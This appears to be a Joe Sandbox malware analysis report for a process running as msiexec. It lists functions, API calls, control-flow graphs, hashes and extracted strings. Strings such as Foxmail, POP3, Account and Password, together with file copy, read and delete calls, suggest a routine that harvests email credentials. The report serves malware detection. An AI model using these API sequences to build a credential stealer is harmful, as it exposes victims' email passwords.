                                                                                                        • Instruction ID: 793a957c4b0a9584553af1d1a8e70354beaf8b3b74e6c1faa887f1d7b9c176af
                                                                                                        • Opcode Fuzzy Hash: a84c53ce2986e70f438908003225df536cf7bc40b61c9246bfc1d54d5ecd16f7
                                                                                                        • Instruction Fuzzy Hash: 90219E76544308ABD724EB64DC48F9B7B9CEF85314F040D2ABA9DD31E0EB74DA088796
                                                                                                        Function 228E12EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 228E1434
                                                                                                          • Part of subcall function 228E10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 228E1137
                                                                                                          • Part of subcall function 228E10F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 228E1151
                                                                                                          • Part of subcall function 228E10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 228E115C
                                                                                                          • Part of subcall function 228E10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 228E116D
                                                                                                          • Part of subcall function 228E10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 228E117C
                                                                                                          • Part of subcall function 228E10F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 228E1193
                                                                                                          • Part of subcall function 228E10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 228E11D0
                                                                                                          • Part of subcall function 228E10F1: FindClose.KERNEL32(00000000), ref: 228E11DB
                                                                                                        • lstrlenW.KERNEL32(?), ref: 228E14C5
                                                                                                        • lstrlenW.KERNEL32(?), ref: 228E14E0
                                                                                                        • lstrlenW.KERNEL32(?,?), ref: 228E150F
                                                                                                        • lstrcatW.KERNEL32(00000000), ref: 228E1521
                                                                                                        • lstrlenW.KERNEL32(?,?), ref: 228E1547
                                                                                                        • lstrcatW.KERNEL32(00000000), ref: 228E1553
                                                                                                        • lstrlenW.KERNEL32(?,?), ref: 228E1579
                                                                                                        • lstrcatW.KERNEL32(00000000), ref: 228E1585
                                                                                                        • lstrlenW.KERNEL32(?,?), ref: 228E15AB
                                                                                                        • lstrcatW.KERNEL32(00000000), ref: 228E15B7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                        • String ID: )$Foxmail$ProgramFiles
                                                                                                        • API String ID: 672098462-2938083778
                                                                                                        • Opcode ID: 69fe64d053dc355b212ddb433caf1c329b7dbfef38835c99c678a58bb3ac2dd1
                                                                                                        • Instruction ID: fed009b314621e26554e82d108169c19c1fa9c406179fba4b442f8d3435567e7
                                                                                                        • Opcode Fuzzy Hash: 69fe64d053dc355b212ddb433caf1c329b7dbfef38835c99c678a58bb3ac2dd1
                                                                                                        • Instruction Fuzzy Hash: D281D175A10318E9EB20CBA4DC85FEE733DEF85700F0005A6F509E71A0EAB19A84CB95

                                                                                                        Non-executed Functions

                                                                                                        Function 228E60E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 228E61DA
                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 228E61E4
                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 228E61F1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                        • String ID:
                                                                                                        • API String ID: 3906539128-0
                                                                                                        • Opcode ID: e9cfcb510b362faa70dfe210450ed5b157790cac2153b61e400b346818f5e97b
                                                                                                        • Instruction ID: e2fb54a26eeae0de3fdf7a8f7a8c9cf07442ce0d0815f8bb7ef75f9051b06a05
                                                                                                        • Opcode Fuzzy Hash: e9cfcb510b362faa70dfe210450ed5b157790cac2153b61e400b346818f5e97b
                                                                                                        • Instruction Fuzzy Hash: CD31C274941328DBCB61DF28D988B8DBBB8AF09310F5041DAF81DA6291E7749B85CF45
                                                                                                        Function 228E4AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32(?,?,228E4A8A,?,228F2238,0000000C,228E4BBD,00000000,00000000,?,228E2082,228F2108,0000000C,228E1F3A,?), ref: 228E4AD5
                                                                                                        • TerminateProcess.KERNEL32(00000000,?,228E4A8A,?,228F2238,0000000C,228E4BBD,00000000,00000000,?,228E2082,228F2108,0000000C,228E1F3A,?), ref: 228E4ADC
                                                                                                        • ExitProcess.KERNEL32 ref: 228E4AEE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                        • String ID:
                                                                                                        • API String ID: 1703294689-0
                                                                                                        • Opcode ID: d79e8fef8d39c9a547b0b8b7b50a6a292a2cfe2d9d0f4795d48a5bba9a335418
                                                                                                        • Instruction ID: 3667b12466a16413b42d0c81bc72434049a92b411ea88c578c25c47fbff07018
                                                                                                        • Opcode Fuzzy Hash: d79e8fef8d39c9a547b0b8b7b50a6a292a2cfe2d9d0f4795d48a5bba9a335418
                                                                                                        • Instruction Fuzzy Hash: 27E0463A000308EFCF01AF68CE08A493B2AEF46351F004410FE2E8B462EB39D996DB44
                                                                                                        Function 228E6580 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: .
                                                                                                        • API String ID: 0-248832578
                                                                                                        • Opcode ID: 65f3815672f67ba8848efd44d01acbaefdaf6ab0caec80e79597ff7ea506a451
                                                                                                        • Instruction ID: ced20a17cb7bb3abb98a83e82edf5d8beea615852982a5ed5935186f78af6246
                                                                                                        • Opcode Fuzzy Hash: 65f3815672f67ba8848efd44d01acbaefdaf6ab0caec80e79597ff7ea506a451
                                                                                                        • Instruction Fuzzy Hash: FC3106B5900329EFCB148E78CD84EEA7BBDDB86314F0401A8F91E97293E631DA45CB50
                                                                                                        Function 228E724E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HeapProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 54951025-0
                                                                                                        • Opcode ID: 61d278311fb5a2799ad38a130e8b6d9228cd850422a1ee1f0a795d559f111ef7
                                                                                                        • Instruction ID: 3905b38bd09e328790e127ac585901585bfb432f922ce774782c186b6d7cb8f0
                                                                                                        • Opcode Fuzzy Hash: 61d278311fb5a2799ad38a130e8b6d9228cd850422a1ee1f0a795d559f111ef7
                                                                                                        • Instruction Fuzzy Hash: A3A01130282202CF83208E308A0A20C3AACAA002A030A0828BE0AC8088FB2CC0008A00
                                                                                                        Function 228E173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 228E1CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 228E1D1B
                                                                                                          • Part of subcall function 228E1CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 228E1D37
                                                                                                          • Part of subcall function 228E1CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 228E1D4B
                                                                                                        • _strlen.LIBCMT ref: 228E1855
                                                                                                        • _strlen.LIBCMT ref: 228E1869
                                                                                                        • _strlen.LIBCMT ref: 228E188B
                                                                                                        • _strlen.LIBCMT ref: 228E18AE
                                                                                                        • _strlen.LIBCMT ref: 228E18C8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _strlen$File$CopyCreateDelete
                                                                                                        • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                        • API String ID: 3296212668-3023110444
                                                                                                        • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                        • Instruction ID: a66efc0c7dcf60d885727699a5472828d0df047f6028bd4bd2644a1e31670beb
                                                                                                        • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                        • Instruction Fuzzy Hash: DA61E579D00318EAEF199BA8C840BEEB7B9AF17304F404156F20EA7264DB74DE45CB52
                                                                                                        Function 228E19B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _strlen
                                                                                                        • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                        • API String ID: 4218353326-230879103
                                                                                                        • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                        • Instruction ID: 5a71ceab57732e415fc24e5e30d58d5294d97bfb3cb1dd8e72c3e7b9f200e9e5
                                                                                                        • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                        • Instruction Fuzzy Hash: 0771E775D003289BDB159BA89C84AEF7BFC9F1A304F104096F64DD7141E674DB89CB60
                                                                                                        Function 228E7CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 203 228e7cc2-228e7cd6 204 228e7cd8-228e7cdd 203->204 205 228e7d44-228e7d4c 203->205 204->205 206 228e7cdf-228e7ce4 204->206 207 228e7d4e-228e7d51 205->207 208 228e7d93-228e7dab call 228e7e35 205->208 206->205 209 228e7ce6-228e7ce9 206->209 207->208 211 228e7d53-228e7d90 call 228e571e * 4 207->211 218 228e7dae-228e7db5 208->218 209->205 212 228e7ceb-228e7cf3 209->212 211->208 216 228e7d0d-228e7d15 212->216 217 228e7cf5-228e7cf8 212->217 220 228e7d2f-228e7d43 call 228e571e * 2 216->220 221 228e7d17-228e7d1a 216->221 217->216 222 228e7cfa-228e7d0c call 228e571e call 228e90ba 217->222 223 228e7db7-228e7dbb 218->223 224 228e7dd4-228e7dd8 218->224 220->205 221->220 226 228e7d1c-228e7d2e call 228e571e call 228e91b8 221->226 222->216 231 228e7dbd-228e7dc0 223->231 232 228e7dd1 223->232 227 228e7dda-228e7ddf 224->227 228 228e7df0-228e7dfc 224->228 226->220 235 228e7ded 227->235 236 228e7de1-228e7de4 227->236 228->218 238 228e7dfe-228e7e0b call 228e571e 228->238 231->232 240 228e7dc2-228e7dd0 call 228e571e * 2 231->240 232->224 235->228 236->235 243 228e7de6-228e7dec call 228e571e 236->243 240->232 243->235
                                                                                                        APIs
                                                                                                        • ___free_lconv_mon.LIBCMT ref: 228E7D06
                                                                                                          • Part of subcall function 228E90BA: _free.LIBCMT ref: 228E90D7
                                                                                                          • Part of subcall function 228E90BA: _free.LIBCMT ref: 228E90E9
                                                                                                          • Part of subcall function 228E90BA: _free.LIBCMT ref: 228E90FB
                                                                                                          • Part of subcall function 228E90BA: _free.LIBCMT ref: 228E910D
                                                                                                          • Part of subcall function 228E90BA: _free.LIBCMT ref: 228E911F
                                                                                                          • Part of subcall function 228E90BA: _free.LIBCMT ref: 228E9131
                                                                                                          • Part of subcall function 228E90BA: _free.LIBCMT ref: 228E9143
                                                                                                          • Part of subcall function 228E90BA: _free.LIBCMT ref: 228E9155
                                                                                                          • Part of subcall function 228E90BA: _free.LIBCMT ref: 228E9167
                                                                                                          • Part of subcall function 228E90BA: _free.LIBCMT ref: 228E9179
                                                                                                          • Part of subcall function 228E90BA: _free.LIBCMT ref: 228E918B
                                                                                                          • Part of subcall function 228E90BA: _free.LIBCMT ref: 228E919D
                                                                                                          • Part of subcall function 228E90BA: _free.LIBCMT ref: 228E91AF
                                                                                                        • _free.LIBCMT ref: 228E7CFB
                                                                                                          • Part of subcall function 228E571E: HeapFree.KERNEL32(00000000,00000000,?,228E924F,?,00000000,?,00000000,?,228E9276,?,00000007,?,?,228E7E5A,?), ref: 228E5734
                                                                                                          • Part of subcall function 228E571E: GetLastError.KERNEL32(?,?,228E924F,?,00000000,?,00000000,?,228E9276,?,00000007,?,?,228E7E5A,?,?), ref: 228E5746
                                                                                                        • _free.LIBCMT ref: 228E7D1D
                                                                                                        • _free.LIBCMT ref: 228E7D32
                                                                                                        • _free.LIBCMT ref: 228E7D3D
                                                                                                        • _free.LIBCMT ref: 228E7D5F
                                                                                                        • _free.LIBCMT ref: 228E7D72
                                                                                                        • _free.LIBCMT ref: 228E7D80
                                                                                                        • _free.LIBCMT ref: 228E7D8B
                                                                                                        • _free.LIBCMT ref: 228E7DC3
                                                                                                        • _free.LIBCMT ref: 228E7DCA
                                                                                                        • _free.LIBCMT ref: 228E7DE7
                                                                                                        • _free.LIBCMT ref: 228E7DFF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                        • String ID:
                                                                                                        • API String ID: 161543041-0
                                                                                                        • Opcode ID: fa5c57ef2a1f9f15f1d06cb7ef6cee8b9f358e877df1445d60dece46ffcde707
                                                                                                        • Instruction ID: c56e1d6d7d93bd4b1550937dc8ca4ec0c119f5cea2099847f70e93fe1327a9c8
                                                                                                        • Opcode Fuzzy Hash: fa5c57ef2a1f9f15f1d06cb7ef6cee8b9f358e877df1445d60dece46ffcde707
                                                                                                        • Instruction Fuzzy Hash: 1B315B39600344DFDB219E38DA41BAA77EAEF02354F104469FA4ED7195DB79F990CB10
                                                                                                        Function 228E59D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 228E59EA
                                                                                                          • Part of subcall function 228E571E: HeapFree.KERNEL32(00000000,00000000,?,228E924F,?,00000000,?,00000000,?,228E9276,?,00000007,?,?,228E7E5A,?), ref: 228E5734
                                                                                                          • Part of subcall function 228E571E: GetLastError.KERNEL32(?,?,228E924F,?,00000000,?,00000000,?,228E9276,?,00000007,?,?,228E7E5A,?,?), ref: 228E5746
                                                                                                        • _free.LIBCMT ref: 228E59F6
                                                                                                        • _free.LIBCMT ref: 228E5A01
                                                                                                        • _free.LIBCMT ref: 228E5A0C
                                                                                                        • _free.LIBCMT ref: 228E5A17
                                                                                                        • _free.LIBCMT ref: 228E5A22
                                                                                                        • _free.LIBCMT ref: 228E5A2D
                                                                                                        • _free.LIBCMT ref: 228E5A38
                                                                                                        • _free.LIBCMT ref: 228E5A43
                                                                                                        • _free.LIBCMT ref: 228E5A51
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 776569668-0
                                                                                                        • Opcode ID: 4182fd568efecde5720ddc30f4421a16c25b32180e2ba5265f626629228d0bd0
                                                                                                        • Instruction ID: 2fa8bc1502c179074efa801e8e46a5fe41a1de2133ac1e0a572ded8adc816eea
                                                                                                        • Opcode Fuzzy Hash: 4182fd568efecde5720ddc30f4421a16c25b32180e2ba5265f626629228d0bd0
                                                                                                        • Instruction Fuzzy Hash: FB11947E510348EFCB21DF58CD42CD93FA5AF15390B054091BA0E8B121DB35DA60DB80
                                                                                                        Function 228EAA53 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 287 228eaa53-228eaa6e 288 228eaa80 287->288 289 228eaa70-228eaa7e RtlDecodePointer 287->289 290 228eaa85-228eaa8b 288->290 289->290 291 228eabb2-228eabb5 290->291 292 228eaa91 290->292 295 228eabb7-228eabba 291->295 296 228eac12 291->296 293 228eaba6 292->293 294 228eaa97-228eaa9a 292->294 297 228eaba8-228eabad 293->297 298 228eab47-228eab4a 294->298 299 228eaaa0 294->299 301 228eabbc-228eabbf 295->301 302 228eac06 295->302 300 228eac19 296->300 305 228eac5b-228eac6a call 228e2ada 297->305 303 228eab4c-228eab4f 298->303 304 228eab9d-228eaba4 298->304 306 228eaaa6-228eaaab 299->306 307 228eab34-228eab42 299->307 308 228eac20-228eac49 300->308 309 228eabfa 301->309 310 228eabc1-228eabc4 301->310 302->296 313 228eab94-228eab9b 303->313 314 228eab51-228eab54 303->314 316 228eab61-228eab8f 304->316 317 228eaaad-228eaab0 306->317 318 228eab25-228eab2f 306->318 307->308 334 228eac4b-228eac50 call 228e6368 308->334 335 228eac56-228eac59 308->335 309->302 311 228eabee 310->311 312 228eabc6-228eabc9 310->312 311->309 322 228eabcb-228eabd0 312->322 323 228eabe2 312->323 313->300 314->305 324 228eab5a 314->324 316->335 319 228eab1c-228eab23 317->319 320 228eaab2-228eaab5 317->320 318->308 331 228eaac7-228eaaf7 319->331 326 228eab0d-228eab17 320->326 327 228eaab7-228eaaba 320->327 328 228eabdb-228eabe0 322->328 329 228eabd2-228eabd5 322->329 323->311 324->316 326->308 327->305 332 228eaac0 327->332 328->297 329->305 329->328 331->335 341 228eaafd-228eab08 call 228e6368 331->341 332->331 334->335 335->305 341->335
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DecodePointer
                                                                                                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                        • API String ID: 3527080286-3064271455
                                                                                                        • Opcode ID: 7f140c781a3fa56f0dbee81e54b51f83ad50c0761fd273da2e7183ca9c3771e5
                                                                                                        • Instruction ID: c2e74efa76fd753d1ec100aab0e2ab7a9a2774879a0f7e20e843718afdab5d03
                                                                                                        • Opcode Fuzzy Hash: 7f140c781a3fa56f0dbee81e54b51f83ad50c0761fd273da2e7183ca9c3771e5
                                                                                                        • Instruction Fuzzy Hash: C3518F7890070DCBDB00CFA4DA845ACBBB4FF5B714F504285F58AA7264D77ACA68CB14
                                                                                                        Function 228E1CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 228E1D1B
                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 228E1D37
                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 228E1D4B
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 228E1D58
                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 228E1D72
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 228E1D7D
                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 228E1D8A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                        • String ID:
                                                                                                        • API String ID: 1454806937-0
                                                                                                        • Opcode ID: bb5c7352835504d61fb28f1bf0b8fc592bd7095c9896f4314c988408b5d290dc
                                                                                                        • Instruction ID: 19c3e2589a3d9a5a63a3f0db76ad53f9abd2aa1625e4f60d7713a146578eb220
                                                                                                        • Opcode Fuzzy Hash: bb5c7352835504d61fb28f1bf0b8fc592bd7095c9896f4314c988408b5d290dc
                                                                                                        • Instruction Fuzzy Hash: 4B215EB5A4121CFFE7109BA48C8CEEF77ACEB19354F0409A5F90AD2185E674DE498B70
                                                                                                        Function 228E9492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 361 228e9492-228e94ef GetConsoleCP 362 228e94f5-228e9511 361->362 363 228e9632-228e9644 call 228e2ada 361->363 365 228e952c-228e953d call 228e7c19 362->365 366 228e9513-228e952a 362->366 373 228e953f-228e9542 365->373 374 228e9563-228e9565 365->374 368 228e9566-228e9575 call 228e79e6 366->368 368->363 375 228e957b-228e959b WideCharToMultiByte 368->375 376 228e9548-228e955a call 228e79e6 373->376 377 228e9609-228e9628 373->377 374->368 375->363 378 228e95a1-228e95b7 WriteFile 375->378 376->363 383 228e9560-228e9561 376->383 377->363 380 228e962a-228e9630 GetLastError 378->380 381 228e95b9-228e95ca 378->381 380->363 381->363 384 228e95cc-228e95d0 381->384 383->375 385 228e95fe-228e9601 384->385 386 228e95d2-228e95f0 WriteFile 384->386 385->362 388 228e9607 385->388 386->380 387 228e95f2-228e95f6 386->387 387->363 389 228e95f8-228e95fb 387->389 388->363 389->385
                                                                                                        APIs
                                                                                                        • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,228E9C07,?,00000000,?,00000000,00000000), ref: 228E94D4
                                                                                                        • __fassign.LIBCMT ref: 228E954F
                                                                                                        • __fassign.LIBCMT ref: 228E956A
                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000005,00000000,00000000), ref: 228E9590
                                                                                                        • WriteFile.KERNEL32(?,?,00000000,228E9C07,00000000,?,?,?,?,?,?,?,?,?,228E9C07,?), ref: 228E95AF
                                                                                                        • WriteFile.KERNEL32(?,?,?,228E9C07,00000000,?,?,?,?,?,?,?,?,?,228E9C07,?), ref: 228E95E8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                        • String ID:
                                                                                                        • API String ID: 1324828854-0
                                                                                                        • Opcode ID: 31f71bca59034bed4c63358d3662f1c3072c38cf577eac294b48fc601692ae34
                                                                                                        • Instruction ID: e7844ab783796f61590232472f18328f97f652d40f2dfae0f8646dc074c2c2cf
                                                                                                        • Opcode Fuzzy Hash: 31f71bca59034bed4c63358d3662f1c3072c38cf577eac294b48fc601692ae34
                                                                                                        • Instruction Fuzzy Hash: 865192B5D00249DFDB10CFA8C891ADEBBF8EF49300F14451AF95AE7291E674D941CB60
                                                                                                        Function 228E3370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
